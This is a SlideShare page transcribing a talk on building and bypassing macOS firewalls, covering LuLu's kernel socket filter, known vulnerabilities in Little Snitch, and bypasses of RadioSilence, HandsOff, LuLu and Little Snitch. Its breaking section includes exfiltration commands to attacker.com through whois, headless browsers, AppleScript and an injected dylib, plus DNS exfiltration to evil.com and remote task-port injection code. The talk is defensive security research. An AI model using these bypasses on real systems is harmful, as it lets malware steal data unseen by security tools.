SlideShare ist ein Scribd-Unternehmen logo

Fire & Ice: Making and Breaking macOS Firewalls

Priyanka Aash
Priyanka Aash

"In the ever raging battle between malicious code and anti-malware tools, firewalls play an essential role. Many a malware has been generically thwarted thanks to the watchful eye of these products. However on macOS, firewalls are rather poorly understood. Apple's documentation surrounding it's network filter interfaces is rather lacking and all commercial macOS firewalls are closed source. This talk aims to take a peek behind the proverbial curtain revealing how to both create and 'destroy' macOS firewalls. In this talk, we'll first dive into what it takes to create an effective firewall for macOS. Yes we'll discuss core concepts such as kernel-level socket filtering—but also how to communicate with user-mode components, install privileged code in a secure manner, and simple ways to implement self-defense mechanisms (including protecting the UI from synthetic events). Of course any security tool, including firewalls, can be broken. After looking at various macOS malware specimens that proactively attempt to detect such firewalls, we'll don our 'gray' (black?) hats to discuss various attacks against these products. And while some attacks are well known, others are currently undisclosed and can generically bypass even today's most vigilant Mac firewalls. But all is not lost. By proactively discussing such attacks, combined with our newly-found understandings of firewall internals, we can improve the existing status quo, advancing firewall development. With a little luck, such advancements may foil, or at least complicate the lives of tomorrow's sophisticated Mac malware!"

Technologie
1 von 47
Downloaden Sie, um offline zu lesen
digita security Fire & Ice making and breaking mac firewalls
WHOIS cybersecurity solutions for the macOS enterprise @patrickwardle synack digitansanasa
Outline making breaking macos firewalls socket filter }bugs bypasses } ipc, rules, alerts
digita security MAKING A FIREWALL filtering network traffic
The Goal to monitor all network traffic; blocking unauthorized traffic while allowing trusted (legitimate) connections we'll focus on outgoing traffic (as Apple's built-in firewall is sufficient for incoming)C&C server malware infects system malware attempts to connect to C&C server or exfil data firewall detects unauthorized connection, alerting user } generically no a priori knowledge LuLu github.com/objective-see/LuLu
Network Kernel Extensions & socket filters "Network kernel extensions (NKEs) provide a way to extend and modify the networking infrastructure of OS X" -developer.apple.com Apple's Network Kernel Extensions Programming Guide Socket Filter (NKE) "filter inbound or outbound traffic on a socket" -developer.apple.com socket operation allowed kernel mode
Registering a Socket Filter the sflt_filter structure "A socket filter is registered by [first] filling out desired callbacks in the sflt_filter structure." OS X and iOS Kernel Programming struct sflt_filter { sflt_handle sf_handle; int sf_flags; char *sf_name; sf_unregistered_func sf_unregistered; sf_attach_func sf_attach; sf_detach_func sf_detach; sf_notify_func sf_notify; sf_getpeername_func sf_getpeername; sf_getsockname_func sf_getsockname; sf_data_in_func sf_data_in; sf_data_out_func sf_data_out; sf_connect_in_func sf_connect_in; sf_connect_out_func sf_connect_out; sf_bind_func sf_bind; sf_setoption_func sf_setoption; sf_getoption_func sf_getoption; .... struct sflt_filter (kpi_socketfilter.h) int sf_flags: set to SFLT_GLOBAL }callbacks (optional) attach data in/out detach
Registering a Socket Filter the sflt_register function extern errno_t sflt_register(const struct sflt_filter *filter, int domain, int type, int protocol); //register socket filter // AF_INET domain, SOCK_STREAM type, TCP protocol sflt_register(&tcpFilterIPV4, AF_INET, SOCK_STREAM, IPPROTO_TCP) socket operation invoke sflt_register() for each domain, type, and protocol AF_INET/SOCK_STREAM/TCP AF_INET/SOCK_DGRAM/UDP AF_INET6/SOCK_STREAM/TCP etc... registering a socker filter
Socket Filter Callbacks sf_attach_func: new sockets //callback for new sockets static kern_return_t attach(void **cookie, socket_t so); "The attach function...[is] called whenever [the] filter attaches itself to a socket. This happens...when the socket is created." OS X and iOS Kernel Programming the socket per socket data static kern_return_t attach(void **cookie, socket_t so){ //alloc cookie *cookie = (void*)OSMalloc(sizeof(struct cookieStruct), allocTag); //save rule action // values: allow/deny/ask ((struct cookieStruct*)(*cookie))->action = queryRule(proc_selfpid()); LuLu's attach function
Socket Filter Callbacks sf_connect_out_func: outgoing connections //callback for outgoing (TCP) connections static kern_return_t connect_out(void *cookie, socket_t so, const struct sockaddr *to) "sf_connect_out_func is called to filter outbound connections. A protocol will call this before initiating an outbound connection." kpi_socketfilter.h the (attached) socket per socket data kern_return_t connect_out(void *cookie, socket_t so, const struct sockaddr *to){ //rule says 'allow'?
 if(RULE_STATE_ALLOW == cookie->ruleAction) return kIOReturnSuccess; //rule says 'block'? if(RULE_STATE_BLOCK == cookie->ruleAction) return kIOReturnError; //unknown (new) process.. LuLu's connect_out function remote address
Callback: sf_connect_out_func handling an unknown process //nap time! IOLockSleep(ruleEventLock, &ruleEventLock, THREAD_ABORTSAFE); put thread to sleep sf_connect_out_func invoked on the thread of process connecting out! report event to user-mode daemon via shared queue //data queue IOSharedDataQueue *sharedDataQueue = NULL; //shared memory IOMemoryDescriptor *sharedMemoryDescriptor = NULL;
 //get memory descriptor // used in `clientMemoryForType` method sharedMemoryDescriptor = sharedDataQueue->getMemoryDescriptor(); ... //queue it up sharedDataQueue->enqueue_tail(&event, sizeof(firewallEvent));lulu (user-mode)
Callback: sf_connect_out_func handling an unknown process daemon daemon, passes event to login item via XPC login item //process alert request from client // blocks for queue item, then sends to client -(void)alertRequest:(void (^)(NSDictionary* alert))reply { //read off queue self.dequeuedAlert = [eventQueue dequeue]; //return alert reply(self.dequeuedAlert); return; } login item displays alert ...& awaits for user's response allowdeny! <process> is trying to connect to <addr> alert
Callback: sf_connect_out_func handling an unknown process " " user's response passed back to daemon (XPC) daemon save to rule database "allow" || "block" }kext send to kext (iokit) awake thread & apply response
Process Classification known? unknown? socket operation //get process pid_t process = proc_selfpid(); socket filter callback(s), are invoked in context of process that initiated socket operation lulu (user-mode) generate code signing info (or hash) of process query rules database known process? tell kernel block/allow} unknown process? alert user/get response
LuLu the free macOS firewall github.com/objective-see/LuLu full src code: rule's window alert installer
digita security BREAKING FIREWALLS exploiting & bypassing
The Goal access the network (e.g. connect out to a malicious C&C server or exfiltrate data) without being blocked by a firewall. C&C server infected host firewall 'aware' malware firewall (security) flaws firewall bypasses } product specific generic
Firewall 'Aware' Malware is a firewall detected? yah; then gtfo "They were finally caught while attempting to upload a screenshot to one of their own servers, according to the report. A piece of security software called Little Snitch ... was installed on one of the information security employees’ laptops [at Palantir], and it flagged the suspicious upload attempt" -buzzfeed $ cat Twitter1 if [ -e /System/Library/Extensions/LittleSnitch.kext ] then cd "$DIR" ./Twitterrific exit 0 fi ... OSX.DevilRobber LittleSnitch (firewall) installed? ...yes; skip infecting the system! red team: caught!
Firewall Vulnerabilities little snitch ring-0 heap overflow (wardle/cve-2016-8661) 32bit void* OSMalloc( uint32_t size ...); int copyin(..., vm_size_t nbytes ); offset 15 ... 8 7 6 5 4 3 2 1 0 value 1 0 0 0 0 0 0 0 2 64bit 64bit value: 0x100000002 32bit value: 0x100000002 vs. kernel heapheap buffer 
 [size: 2 bytes] rest of heap.... heap buffer 
 [size: 2 bytes] rest of heap.... 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 vm_size_t 
 is 64bits! kernel heapsub_FFFFFF7FA13EABB2 proc mov rbx, rsi mov rdi, [rbx+30h] ; user-mode struct mov rbx, rdi mov rdi, [rbx+8] ; size ... mov rsi, cs:allocTag call _OSMalloc ; malloc ... mov rdi, [rbx] ; in buffer mov rdx, [rbx+8] ; size mov rsi, rax ; out buffer (just alloc'd) call _copyin
Firewall Vulnerabilities little snitch installer/updater local EoP (versions < 4.1) (lldb) po $rdx { /bin/rm -Rf "$DESTINATION" && /bin/cp -Rp "$SOURCE" "$DESTINATION" && /usr/sbin/chown -R root:wheel "$DESTINATION" && /bin/chmod -R a+rX,og-w "$DESTINATION"; } 2>&1 (lldb) po [[NSProcessInfo processInfo] environment] ... DESTINATION = "/Library/Little Snitch/Little Snitch Daemon.bundle"; SOURCE = "/Volumes/Little Snitch 4.0.6/Little Snitch Installer.app/Contents/Resources/ Little Snitch Daemon.bundle"; .dmg cp pkg/.../Little Snitch Daemon.bundle /Library/Little Snitch/ chown -R root:wheel 
 /Library/Little Snitch/ little snitch installer logic #_
Bypassing RadioSilence ...don't trust a name! "The easiest network monitor and firewall for Mac...Radio Silence can stop any app from making network connections" -radiosilenceapp.com com.radiosilenceapp.nke.filter int _is_process_blacklisted(int arg0, int arg1) { return _is_process_or_ancestor_listed(r14, 0x0); } int _is_process_or_ancestor_listed(int arg0, int arg1) { //'launchd' can't be blacklisted _proc_name(arg0, &processName, 0x11); rax = _strncmp("launchd", &processName, 0x10); if (rax == 0x0) goto leave; ... return rax; } blacklist'ing check
Bypassing RadioSilence ...don't trust a name! $ ~/Desktop/launchd google.com <HTML><BODY> <H1>301 Moved</H1> The document has moved <A HREF="http://www.google.com/">here</A>. </BODY></HTML> bypass: name malware: 'launchd' blacklist malware ...still connects out!
Bypassing HandsOff ...don't trust a click! "Keep an eye on Internet connections from all applications as to expose the hidden connections. Prevent them from sending data without your consent" -handsoff $ curl google.com Allow " " void bypass(float X, float Y){
 //clicky clicky CGPostMouseEvent(CGPointMake(X, Y), true, 1, true); CGPostMouseEvent(CGPointMake(X, Y), true, 1, false); } synthetic click <HTML><HEAD> <TITLE>301 Moved</TITLE>
Bypassing LuLu ...don't trust a system utility! "the free macOS firewall that aims to block unauthorized (outgoing) network traffic" -lulu //apple utils // may be abused, so trigger an alert NSString* const GRAYLISTED_BINARIES[] = { @"com.apple.nc", @"com.apple.curl", @"com.apple.ruby", @"com.apple.perl", @"com.apple.perl5", @"com.apple.python", @"com.apple.python2", @"com.apple.pythonw", @"com.apple.openssh", @"com.apple.osascript" }; is there an(other) system utility that we can abuse? LuLu's 'graylist'
Bypassing LuLu ...don't trust a system utility! $ echo "exfil this data" > exfil.txt $ RHOST=attacker.com $ RPORT=12345 $ LFILE=file_to_send $ whois -h $RHOST -p $RPORT "`cat $LFILE`" LuLu(105): 
 due to preferences, allowing apple process: /usr/bin/whois LuLu(105): adding rule for /usr/bin/whois
 ({ signedByApple = 1; signingIdentifier = "com.apple.whois"; }): action: ALLOW exfil via 'whois' via @info_dox LuLu (debug) log ...traffic (silently) allowed
Bypassing LittleSnitch ...don't trust a domain! $ curl https://setup.icloud.com/setup/ws/1/login {"success":false,"error":"Invalid ... header"} curl little snitch (kext) *.icloud.com
Bypassing LittleSnitch ...don't trust a domain! $ python iCloud.py upload ~/Desktop/topSecret.txt [1] login: https://setup.icloud.com/setup/ws/1/login params: {'clientBuildNumber': '15A99', 'clientId': '12A9D426-C45B-11E4-BA3B-B8E8563151B4'}
 
 [2] init'ing upload: https://p34-docws.icloud.com/ws/com.apple.CloudDocs/upload/web params: {'token': 'AQAAAABU-jxwYG7i1C7BBsuqtqfsa74Rb_2u6yI~"'} data: {"size": 6, "type": "FILE", "content_type": "text/plain", "filename": "topSecret.txt"}
 
 response: [{u'url': u'https://p34-contentws.icloud.com:443/8205919168/singleFileUpload? tk=BRC9cJWSP7a4AxOYKf8K&ref=01003e53bebaf26c7c47a33486f7776a26f60568a6&c=com.apple.clouddocs &z=com.apple.CloudDocs&uuid=3f678124-94d4-4fa0-9f1f-6d24dbc49f17&e=AvKdu5MfcUeIfLPJ6MeWTV6dS EBoN3BPTCwGHjqSF8jVCEfsXhKglXKR58YkzILGWw', u'owner': u'8205919168', u'document_id': u'BF38917E-DD30-44A9-8E34-32ABB7800899', u'owner_id': u'_ee6a3e4219e1fb22e1d9d0690b7366b6'}]
 
 [3] uploading to: https://p34-contentws.icloud.com:443/8205919168/singleFileUpload? tk=BRC9cJWSP7a4AxOYKf8K&ref=01003e53bebaf26c7c47a33486f7776a26f60568a6&c=com.apple.clouddocs &z=com.apple.CloudDocs&uuid=3f678124-94d4-4fa0-9f1f-6d24dbc49f17&e=AvKdu5MfcUeIfLPJ6MeWTV6dS EBoN3BPTCwGHjqSF8jVCEfsXhKglXKR58YkzILGWw response: {u'singleFile': {u'referenceChecksum': u'AQA+U7668mx8R6M0hvd3aib2BWim', u'wrappingKey': u'3gtDUoGIjmFloUFCTFvLCQ==', u'receipt': u'A0/B7PXdJi5JC5Ep', u'size': 6, u'fileChecksum': u'Abv+EeVEGAQ0o5/2szwFFOVX1ICw'}} [4] committing upload: https://p34-docws.icloud.com/ws/com.apple.CloudDocs/update/documents exfil to iCloud C&C
Generic Bypasses regardless of firewall product: connect out goal: access the network (e.g. connect to a malicious C&C server or exfiltrate data) without being blocked by (any) firewall. firewalls are inherently disadvantaged ...must allow certain network traffic! system functionality (dns, os updates, etc.) 'usability' (browsers, chat clients, etc.) } passively determine what's allowed abuse these trusted protocols/processes to generically bypass any installed firewall
Generic Bypasses what traffic is allowed? $ lsof -i TCP -sTCP:ESTABLISHED Google Chrome patricks-mbp.lan:58107->ec2-107-21-125-119.compute-1.amazonaws.com:https Signal patricks-mbp.lan:58098->ec2-52-2-222-12.compute-1.amazonaws.com:https Slack patricks-mbp.lan:58071->151.101.196.102:https VMware patricks-mbp.lan:62676->a23-55-114-98.deploy.static.akamaitechnologies.com:https com.apple.WebKit.Networking (Safari) patricks-mbp.lan:58189->a23-55-116-179.deploy.static.akamaitechnologies.com:https Core Sync.app patricks-mbp.lan:58195->ec2-52-5-250-175.compute-1.amazonaws.com:https Creative Cloud.app patricks-mbp.lan:57194->ec2-52-2-42-38.compute-1.amazonaws.com:https GitHub patricks-mbp.lan:58119->lb-192-30-255-116-sea.github.com:https } lsof output (user processes) what's allowed!?
Abusing DNS connect to 'evil.com' XPC resolve 'evil.com' mdnsresponder allowed dns server firewall examines request dns server resolves request macOS 
 domain name resolution handled by mdnsresponder fully trusted by firewalls
Abusing DNS int main(int argc, const char * argv[]) { 
 struct addrinfo *result = {0}; //'resolve' DNS // this is routed to mDNSResponder getaddrinfo(argv[1], NULL, NULL, &result); .... resolve 'data.to.exfilatrate.evil.com' responseencode tasking in A* records HandsOff (in advanced mode) tracks DNS resolutions, but NOT "DNS Service Discovery" (DNS-SD, see: /usr/include/dns_sd.h)
Abusing Browsers synthetic browsing via AppleScript "A browser that is not afforded indiscriminate network access (at least to remote web severs) is rather useless" tell application "Safari" run tell application "Finder" to set visible of process "Safari" to false make new document
 set the URL of document 1 to "http://attacker.com?data=data%20to%20exfil"
 end tell invisible exfil data
Abusing Browsers synthetic browsing via cmdline interfaces $ "Google Chrome" 
 --crash-dumps-dir=/tmp
 --headless http://attacker.com?data=data%20to%20exfil $ firefox-bin 
 --headless http://attacker.com?data=data%20to%20exfil $ open -j -a Safari 
 http://attacker.com?data=data%20to%20exfil //what's user's default browser? CFURLRef http = CFURLCreateWithString(NULL, CFSTR("http://"), NULL); CFURLRef browser = LSCopyDefaultApplicationURLForURL(http, kLSRolesAll, nil); determine default browser
Abusing Code/Dylib Injections any code in a trusted process, is trusted any code running in the context of process trusted ('allowed') by a firewall, will inherit that same trust! injection methods of injection: write to remote memory malicious plugins dylib proxying environment variables targets: 3rd-party apps
Abusing Code/Dylib Injections writing to remote memory //get task ports via 'processor_set_tasks' processor_set_default(myhost, &psDefault); host_processor_set_priv(myhost, psDefault, &psDefault_control); processor_set_tasks(psDefault_control, &tasks, &numTasks); //find process's task port // then (as a poc) remotely allocate some memory for(i = 0; i < numTasks; i++) { pid_for_task(tasks[i], &pid); if (pid == targetPID) { mach_vm_address_t remoteMem = NULL; mach_vm_allocate(tasks[i], &remoteMem, 
 1024, VM_FLAGS_ANYWHERE); //now write & exec injected shellcode "Who needs task_for_pid() anyway..." -(j. levin) # ps aux | grep Slack patrick 36308 /Applications/Slack.app
 # lsof -p 36308 | grep TCP Slack TCP patricks-mbp.lan:57408 -> ec2-52-89-46.us-west-2.compute.amazonaws.com # ./getTaskPort -p 36308 getting task port for Slack (pid: 36308) got task: 0xa703 allocated remote memory @0x109b4e000 ... 'traditional' injection
Abusing Code/Dylib Injections environment variable (DYLD_INSERT_LIBRARIES) $ DYLD_INSERT_LIBRARIES=/tmp/bypass.dylib /Applications/Slack.app/Contents/MacOS/Slack //custom constructor __attribute__((constructor)) static void initializer(void) { NSURL *url = [NSURL URLWithString: @"http://www.attacker.com/?data=data%20to%20exfil%20via%20Slack"]; NSData *data = [NSData dataWithContentsOfURL:url]; } malicious dylib target (trusted) application dylib w/ custom constructor user agent: 'Slack'
Abusing Code/Dylib Injections dylib proxying LC_LOAD_DYLIB: /Applications/<some app>/<some>.dylib note, due to System Integrity Protection (SIP) one cannot replace/proxy system dynamic libraries. LC_LOAD_DYLIB: /Applications/<some app>/<some>.dylib
Abusing Code/Dylib Injections dylib proxying in two easy steps copy original dylib replace original dylib -Xlinker -reexport_library <path to legit dylib> re-export symbols! $ install_name_tool -change <existing value of LC_REEXPORT_DYLIB> <new value for to LC_REEXPORT_DYLIB (e.g target dylib)> <path to dylib to update>
Kernel-based Bypasses in ring-0, no one can stop you! static kern_return_t attach( ... ) { ... //don't mess w/ kernel sockets if(0 == proc_selfpid()) { //allow result = kIOReturnSuccess; goto bail; } traffic from the kernel is generally (allowed) trusted allowing kernel traffic (LuLu)
Kernel-based Bypasses in ring-0, no one can stop you! kernel mode "Different possibilities exist to hide our network connections from Little Snitch and also Apple's application firewall. The easiest one is to patch or hook the sf_attach callback." -fG! (@osxreverser) patch callbacks remove callbacks
Kernel-based Bypasses ok, how do we get into the kernel? get root 'bring' & load buggy kext exploit to run unsigned kernel code(buggy) kext still validly signed! code loaded into the kernel (i.e. kexts) must be signed...and Apple rarely hands out kext signing certs! SlingShot APT (Windows)
Kernel-based Bypasses ok, how do we get into the kernel? "macOS High Sierra 10.13 introduces a new feature that requires user approval before loading new third-party kernel extensions." -apple " " fixed? bypass with synthetic event [0day] "The Mouse is Mightier than the Sword" (DefCon, Sunday 10AM) Apple: yes, 100% fixed Patrick: nope, it's not!!
digita security CONCLUSION wrapping this up
macOS Firewalls kernel socket filter } bugs bypasses firewalls are not enough! use other host-based security products use network-based security products making: breaking:
...ok, one more last thing! "Objective by the Sea" conference ObjectiveByTheSea.com Maui, Hawaii Nov 3rd/4th All things macOS malware bugs security Free for Objective-See patrons!
Finale @patrickwardle patrick@digitasecurity.com cybersecurity solutions for the macOS enterprise digita security
Credits - iconexperience.com - wirdou.com/2012/02/04/is-that-bad-doctor - http://pre04.deviantart.net/2aa3/th/pre/f/ 2010/206/4/4/441488bcc359b59be409ca02f863e843.jpg
 
 - opensource.apple.com - newosxbook.com (*OS Internals) - github.com/objective-see/LuLu - apress.com/gp/book/9781430235361 - phrack.org/issues/69/7.html
 images resources

Empfohlen

DEF CON 23: Internet of Things: Hacking 14 Devices
DEF CON 23: Internet of Things: Hacking 14 DevicesDEF CON 23: Internet of Things: Hacking 14 Devices
DEF CON 23: Internet of Things: Hacking 14 DevicesSynack
 
RSA OSX Malware
RSA OSX MalwareRSA OSX Malware
RSA OSX MalwareSynack
 
Athens IoT meetup #7 - Create the Internet of your Things - Laurent Ellerbach...
Athens IoT meetup #7 - Create the Internet of your Things - Laurent Ellerbach...Athens IoT meetup #7 - Create the Internet of your Things - Laurent Ellerbach...
Athens IoT meetup #7 - Create the Internet of your Things - Laurent Ellerbach...Athens IoT Meetup
 
[DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one!
[DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one![DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one!
[DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one!Synack
 
DEF CON 23: Stick That In Your (root)Pipe & Smoke It
DEF CON 23: Stick That In Your (root)Pipe & Smoke ItDEF CON 23: Stick That In Your (root)Pipe & Smoke It
DEF CON 23: Stick That In Your (root)Pipe & Smoke ItSynack
 
Black Hat '15: Writing Bad @$$ Malware for OS X
Black Hat '15: Writing Bad @$$ Malware for OS XBlack Hat '15: Writing Bad @$$ Malware for OS X
Black Hat '15: Writing Bad @$$ Malware for OS XSynack
 
ZeroNights: Automating iOS blackbox security scanning
ZeroNights: Automating iOS blackbox security scanningZeroNights: Automating iOS blackbox security scanning
ZeroNights: Automating iOS blackbox security scanningMikhail Sosonkin
 
OS X Malware: Let's Play Doctor
OS X Malware: Let's Play DoctorOS X Malware: Let's Play Doctor
OS X Malware: Let's Play DoctorSynack
 

Empfohlen

DEF CON 23: Internet of Things: Hacking 14 Devices
DEF CON 23: Internet of Things: Hacking 14 DevicesDEF CON 23: Internet of Things: Hacking 14 Devices
DEF CON 23: Internet of Things: Hacking 14 DevicesSynack
 
RSA OSX Malware
RSA OSX MalwareRSA OSX Malware
RSA OSX MalwareSynack
 
Athens IoT meetup #7 - Create the Internet of your Things - Laurent Ellerbach...
Athens IoT meetup #7 - Create the Internet of your Things - Laurent Ellerbach...Athens IoT meetup #7 - Create the Internet of your Things - Laurent Ellerbach...
Athens IoT meetup #7 - Create the Internet of your Things - Laurent Ellerbach...Athens IoT Meetup
 
[DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one!
[DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one![DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one!
[DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one!Synack
 
DEF CON 23: Stick That In Your (root)Pipe & Smoke It
DEF CON 23: Stick That In Your (root)Pipe & Smoke ItDEF CON 23: Stick That In Your (root)Pipe & Smoke It
DEF CON 23: Stick That In Your (root)Pipe & Smoke ItSynack
 
Black Hat '15: Writing Bad @$$ Malware for OS X
Black Hat '15: Writing Bad @$$ Malware for OS XBlack Hat '15: Writing Bad @$$ Malware for OS X
Black Hat '15: Writing Bad @$$ Malware for OS XSynack
 
ZeroNights: Automating iOS blackbox security scanning
ZeroNights: Automating iOS blackbox security scanningZeroNights: Automating iOS blackbox security scanning
ZeroNights: Automating iOS blackbox security scanningMikhail Sosonkin
 
OS X Malware: Let's Play Doctor
OS X Malware: Let's Play DoctorOS X Malware: Let's Play Doctor
OS X Malware: Let's Play DoctorSynack
 
Malware Detection with OSSEC HIDS - OSSECCON 2014
Malware Detection with OSSEC HIDS - OSSECCON 2014Malware Detection with OSSEC HIDS - OSSECCON 2014
Malware Detection with OSSEC HIDS - OSSECCON 2014Santiago Bassett
 
Virus Bulletin 2015: Exposing Gatekeeper
Virus Bulletin 2015: Exposing GatekeeperVirus Bulletin 2015: Exposing Gatekeeper
Virus Bulletin 2015: Exposing GatekeeperSynack
 
Simple docker hosting in FIWARE Lab
Simple docker hosting in FIWARE LabSimple docker hosting in FIWARE Lab
Simple docker hosting in FIWARE LabFernando Lopez Aguilar
 
How to deploy spark instance using ansible 2.0 in fiware lab v2
How to deploy spark instance using ansible 2.0 in fiware lab v2How to deploy spark instance using ansible 2.0 in fiware lab v2
How to deploy spark instance using ansible 2.0 in fiware lab v2Fernando Lopez Aguilar
 
Gatekeeper Exposed
Gatekeeper ExposedGatekeeper Exposed
Gatekeeper ExposedSynack
 
Securing the tunnel with Raccoon
Securing the tunnel with RaccoonSecuring the tunnel with Raccoon
Securing the tunnel with RaccoonGloria Stoilova
 
Intro to the FIWARE Lab
Intro to the FIWARE LabIntro to the FIWARE Lab
Intro to the FIWARE LabFIWARE
 
Conf2015 d waddle_defense_pointsecurity_deploying_splunksslbestpractices
Conf2015 d waddle_defense_pointsecurity_deploying_splunksslbestpracticesConf2015 d waddle_defense_pointsecurity_deploying_splunksslbestpractices
Conf2015 d waddle_defense_pointsecurity_deploying_splunksslbestpracticesBrentMatlock
 
RDO-Packstack Workshop
RDO-Packstack Workshop RDO-Packstack Workshop
RDO-Packstack Workshop Thamrongtawal Hashim
 
Who pulls the strings?
Who pulls the strings?Who pulls the strings?
Who pulls the strings?Ronny
 
Strategies to design FUD malware
Strategies to design FUD malwareStrategies to design FUD malware
Strategies to design FUD malwarePedro Tavares
 
iOS Automation Primitives
iOS Automation PrimitivesiOS Automation Primitives
iOS Automation PrimitivesSynack
 
Os Balog
Os BalogOs Balog
Os Balogoscon2007
 
Abusing belkin home automation devices
Abusing belkin home automation devicesAbusing belkin home automation devices
Abusing belkin home automation devicesmark-smith
 
Audit commands by shift
Audit commands by shiftAudit commands by shift
Audit commands by shiftGary Smith
 
Linux Server Hardening - Steps by Steps
Linux Server Hardening - Steps by StepsLinux Server Hardening - Steps by Steps
Linux Server Hardening - Steps by StepsSunil Paudel
 
Manage distributed configuration and secrets with spring cloud and vault (Spr...
Manage distributed configuration and secrets with spring cloud and vault (Spr...Manage distributed configuration and secrets with spring cloud and vault (Spr...
Manage distributed configuration and secrets with spring cloud and vault (Spr...Andreas Falk
 
I psec
I psecI psec
I psecnlekh
 
Synack at AppSec California 2015 - Geolocation Vulnerabilities
Synack at AppSec California 2015 - Geolocation VulnerabilitiesSynack at AppSec California 2015 - Geolocation Vulnerabilities
Synack at AppSec California 2015 - Geolocation VulnerabilitiesSynack
 
Sydney Python Presentation (October 2010) - Splunk
Sydney Python Presentation (October 2010) - SplunkSydney Python Presentation (October 2010) - Splunk
Sydney Python Presentation (October 2010) - SplunkKelvin Nicholson
 
26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rules26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rulesFreddy Buenaño
 
Attacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit FrameworkAttacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit FrameworkChris Gates
 

Weitere ähnliche Inhalte

Was ist angesagt?

Malware Detection with OSSEC HIDS - OSSECCON 2014
Malware Detection with OSSEC HIDS - OSSECCON 2014Malware Detection with OSSEC HIDS - OSSECCON 2014
Malware Detection with OSSEC HIDS - OSSECCON 2014Santiago Bassett
 
Virus Bulletin 2015: Exposing Gatekeeper
Virus Bulletin 2015: Exposing GatekeeperVirus Bulletin 2015: Exposing Gatekeeper
Virus Bulletin 2015: Exposing GatekeeperSynack
 
How to deploy spark instance using ansible 2.0 in fiware lab v2
How to deploy spark instance using ansible 2.0 in fiware lab v2How to deploy spark instance using ansible 2.0 in fiware lab v2
How to deploy spark instance using ansible 2.0 in fiware lab v2Fernando Lopez Aguilar
 
Gatekeeper Exposed
Gatekeeper ExposedGatekeeper Exposed
Gatekeeper ExposedSynack
 
Securing the tunnel with Raccoon
Securing the tunnel with RaccoonSecuring the tunnel with Raccoon
Securing the tunnel with RaccoonGloria Stoilova
 
Intro to the FIWARE Lab
Intro to the FIWARE LabIntro to the FIWARE Lab
Intro to the FIWARE LabFIWARE
 
Conf2015 d waddle_defense_pointsecurity_deploying_splunksslbestpractices
Conf2015 d waddle_defense_pointsecurity_deploying_splunksslbestpracticesConf2015 d waddle_defense_pointsecurity_deploying_splunksslbestpractices
Conf2015 d waddle_defense_pointsecurity_deploying_splunksslbestpracticesBrentMatlock
 
Who pulls the strings?
Who pulls the strings?Who pulls the strings?
Who pulls the strings?Ronny
 
Strategies to design FUD malware
Strategies to design FUD malwareStrategies to design FUD malware
Strategies to design FUD malwarePedro Tavares
 
iOS Automation Primitives
iOS Automation PrimitivesiOS Automation Primitives
iOS Automation PrimitivesSynack
 
Abusing belkin home automation devices
Abusing belkin home automation devicesAbusing belkin home automation devices
Abusing belkin home automation devicesmark-smith
 
Audit commands by shift
Audit commands by shiftAudit commands by shift
Audit commands by shiftGary Smith
 
Linux Server Hardening - Steps by Steps
Linux Server Hardening - Steps by StepsLinux Server Hardening - Steps by Steps
Linux Server Hardening - Steps by StepsSunil Paudel
 
Manage distributed configuration and secrets with spring cloud and vault (Spr...
Manage distributed configuration and secrets with spring cloud and vault (Spr...Manage distributed configuration and secrets with spring cloud and vault (Spr...
Manage distributed configuration and secrets with spring cloud and vault (Spr...Andreas Falk
 
I psec
I psecI psec
I psecnlekh
 
Synack at AppSec California 2015 - Geolocation Vulnerabilities
Synack at AppSec California 2015 - Geolocation VulnerabilitiesSynack at AppSec California 2015 - Geolocation Vulnerabilities
Synack at AppSec California 2015 - Geolocation VulnerabilitiesSynack
 
Sydney Python Presentation (October 2010) - Splunk
Sydney Python Presentation (October 2010) - SplunkSydney Python Presentation (October 2010) - Splunk
Sydney Python Presentation (October 2010) - SplunkKelvin Nicholson
 

Was ist angesagt? (20)

Malware Detection with OSSEC HIDS - OSSECCON 2014
Malware Detection with OSSEC HIDS - OSSECCON 2014Malware Detection with OSSEC HIDS - OSSECCON 2014
Malware Detection with OSSEC HIDS - OSSECCON 2014
 
Virus Bulletin 2015: Exposing Gatekeeper
Virus Bulletin 2015: Exposing GatekeeperVirus Bulletin 2015: Exposing Gatekeeper
Virus Bulletin 2015: Exposing Gatekeeper
 
Simple docker hosting in FIWARE Lab
Simple docker hosting in FIWARE LabSimple docker hosting in FIWARE Lab
Simple docker hosting in FIWARE Lab
 
How to deploy spark instance using ansible 2.0 in fiware lab v2
How to deploy spark instance using ansible 2.0 in fiware lab v2How to deploy spark instance using ansible 2.0 in fiware lab v2
How to deploy spark instance using ansible 2.0 in fiware lab v2
 
Gatekeeper Exposed
Gatekeeper ExposedGatekeeper Exposed
Gatekeeper Exposed
 
Securing the tunnel with Raccoon
Securing the tunnel with RaccoonSecuring the tunnel with Raccoon
Securing the tunnel with Raccoon
 
Intro to the FIWARE Lab
Intro to the FIWARE LabIntro to the FIWARE Lab
Intro to the FIWARE Lab
 
Conf2015 d waddle_defense_pointsecurity_deploying_splunksslbestpractices
Conf2015 d waddle_defense_pointsecurity_deploying_splunksslbestpracticesConf2015 d waddle_defense_pointsecurity_deploying_splunksslbestpractices
Conf2015 d waddle_defense_pointsecurity_deploying_splunksslbestpractices
 
RDO-Packstack Workshop
RDO-Packstack Workshop RDO-Packstack Workshop
RDO-Packstack Workshop
 
Who pulls the strings?
Who pulls the strings?Who pulls the strings?
Who pulls the strings?
 
Strategies to design FUD malware
Strategies to design FUD malwareStrategies to design FUD malware
Strategies to design FUD malware
 
iOS Automation Primitives
iOS Automation PrimitivesiOS Automation Primitives
iOS Automation Primitives
 
Os Balog
Os BalogOs Balog
Os Balog
 
Abusing belkin home automation devices
Abusing belkin home automation devicesAbusing belkin home automation devices
Abusing belkin home automation devices
 
Audit commands by shift
Audit commands by shiftAudit commands by shift
Audit commands by shift
 
Linux Server Hardening - Steps by Steps
Linux Server Hardening - Steps by StepsLinux Server Hardening - Steps by Steps
